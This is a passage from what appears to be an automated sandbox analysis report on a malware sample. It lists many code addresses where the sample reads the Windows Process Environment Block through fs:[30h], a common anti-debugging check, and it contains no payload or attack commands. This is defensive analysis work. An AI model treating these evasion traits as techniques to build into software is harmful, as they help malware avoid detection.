      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4EC1 mov eax, dword ptr fs:[00000030h]4_2_1D8A4EC1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2E32 mov eax, dword ptr fs:[00000030h]4_2_1D7D2E32
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BED0 mov eax, dword ptr fs:[00000030h]4_2_1D80BED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D811ED8 mov eax, dword ptr fs:[00000030h]4_2_1D811ED8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D899ED2 mov eax, dword ptr fs:[00000030h]4_2_1D899ED2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE18 mov ecx, dword ptr fs:[00000030h]4_2_1D7CBE18
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E14
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D801EED mov eax, dword ptr fs:[00000030h]4_2_1D801EED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EEE7 mov eax, dword ptr fs:[00000030h]4_2_1D88EEE7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D873EFC mov eax, dword ptr fs:[00000030h]4_2_1D873EFC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3E01 mov eax, dword ptr fs:[00000030h]4_2_1D7D3E01
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]4_2_1D7D6E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4E03 mov eax, dword ptr fs:[00000030h]4_2_1D8A4E03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]4_2_1D7CCEF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D808E15 mov eax, dword ptr fs:[00000030h]4_2_1D808E15
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]4_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FE1F mov eax, dword ptr fs:[00000030h]4_2_1D84FE1F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3EE2 mov eax, dword ptr fs:[00000030h]4_2_1D7D3EE2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D898E26 mov eax, dword ptr fs:[00000030h]4_2_1D898E26
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D866E30 mov eax, dword ptr fs:[00000030h]4_2_1D866E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D866E30 mov eax, dword ptr fs:[00000030h]4_2_1D866E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov ecx, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D865E30 mov eax, dword ptr fs:[00000030h]4_2_1D865E30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CE3F mov eax, dword ptr fs:[00000030h]4_2_1D80CE3F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]4_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D mov eax, dword ptr fs:[00000030h]4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4E62 mov eax, dword ptr fs:[00000030h]4_2_1D8A4E62
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EE78 mov eax, dword ptr fs:[00000030h]4_2_1D88EE78
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CE70 mov eax, dword ptr fs:[00000030h]4_2_1D80CE70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D807E71 mov eax, dword ptr fs:[00000030h]4_2_1D807E71
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]4_2_1D7FAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]4_2_1D7FAE89
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FBE80 mov eax, dword ptr fs:[00000030h]4_2_1D7FBE80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D6970 mov eax, dword ptr fs:[00000030h]4_2_1D7D6970
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C98F mov eax, dword ptr fs:[00000030h]4_2_1D80C98F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E096B mov eax, dword ptr fs:[00000030h]4_2_1D7E096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E096B mov eax, dword ptr fs:[00000030h]4_2_1D7E096B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F4955 mov eax, dword ptr fs:[00000030h]4_2_1D7F4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F4955 mov eax, dword ptr fs:[00000030h]4_2_1D7F4955
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov ecx, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB950 mov eax, dword ptr fs:[00000030h]4_2_1D7DB950
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85F9AA mov eax, dword ptr fs:[00000030h]4_2_1D85F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85F9AA mov eax, dword ptr fs:[00000030h]4_2_1D85F9AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8089B0 mov edx, dword ptr fs:[00000030h]4_2_1D8089B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FE94E mov eax, dword ptr fs:[00000030h]4_2_1D7FE94E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD940 mov eax, dword ptr fs:[00000030h]4_2_1D7FD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD940 mov eax, dword ptr fs:[00000030h]4_2_1D7FD940
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85D9C7 mov eax, dword ptr fs:[00000030h]4_2_1D85D9C7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A29CF mov eax, dword ptr fs:[00000030h]4_2_1D8A29CF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A29CF mov eax, dword ptr fs:[00000030h]4_2_1D8A29CF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F9938 mov ecx, dword ptr fs:[00000030h]4_2_1D7F9938
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CB931 mov eax, dword ptr fs:[00000030h]4_2_1D7CB931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CB931 mov eax, dword ptr fs:[00000030h]4_2_1D7CB931
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88D9C6 mov eax, dword ptr fs:[00000030h]4_2_1D88D9C6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7917 mov eax, dword ptr fs:[00000030h]4_2_1D7C7917
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8049F0 mov eax, dword ptr fs:[00000030h]4_2_1D8049F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8049F0 mov eax, dword ptr fs:[00000030h]4_2_1D8049F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FB9FA mov eax, dword ptr fs:[00000030h]4_2_1D7FB9FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C99F0 mov ecx, dword ptr fs:[00000030h]4_2_1D7C99F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D09F0 mov eax, dword ptr fs:[00000030h]4_2_1D7D09F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D826912 mov eax, dword ptr fs:[00000030h]4_2_1D826912
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802919 mov eax, dword ptr fs:[00000030h]4_2_1D802919
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802919 mov eax, dword ptr fs:[00000030h]4_2_1D802919
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D805921 mov eax, dword ptr fs:[00000030h]4_2_1D805921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D805921 mov ecx, dword ptr fs:[00000030h]4_2_1D805921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D805921 mov eax, dword ptr fs:[00000030h]4_2_1D805921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D805921 mov eax, dword ptr fs:[00000030h]4_2_1D805921
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89892E mov eax, dword ptr fs:[00000030h]4_2_1D89892E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89892E mov eax, dword ptr fs:[00000030h]4_2_1D89892E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A492D mov eax, dword ptr fs:[00000030h]4_2_1D8A492D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FD9CE mov eax, dword ptr fs:[00000030h]4_2_1D7FD9CE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D82693A mov eax, dword ptr fs:[00000030h]4_2_1D82693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D82693A mov eax, dword ptr fs:[00000030h]4_2_1D82693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D82693A mov eax, dword ptr fs:[00000030h]4_2_1D82693A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB9C0 mov eax, dword ptr fs:[00000030h]4_2_1D7DB9C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DB9C0 mov eax, dword ptr fs:[00000030h]4_2_1D7DB9C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D89C0 mov eax, dword ptr fs:[00000030h]4_2_1D7D89C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D89C0 mov eax, dword ptr fs:[00000030h]4_2_1D7D89C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C944 mov eax, dword ptr fs:[00000030h]4_2_1D80C944
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CB9B0 mov eax, dword ptr fs:[00000030h]4_2_1D7CB9B0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89D946 mov eax, dword ptr fs:[00000030h]4_2_1D89D946
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88D947 mov eax, dword ptr fs:[00000030h]4_2_1D88D947
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80C958 mov eax, dword ptr fs:[00000030h]4_2_1D80C958
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]4_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85395B mov eax, dword ptr fs:[00000030h]4_2_1D85395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85395B mov eax, dword ptr fs:[00000030h]4_2_1D85395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D85395B mov eax, dword ptr fs:[00000030h]4_2_1D85395B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DF870 mov eax, dword ptr fs:[00000030h]4_2_1D7DF870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DF870 mov eax, dword ptr fs:[00000030h]4_2_1D7DF870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E9870 mov eax, dword ptr fs:[00000030h]4_2_1D7E9870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E9870 mov eax, dword ptr fs:[00000030h]4_2_1D7E9870
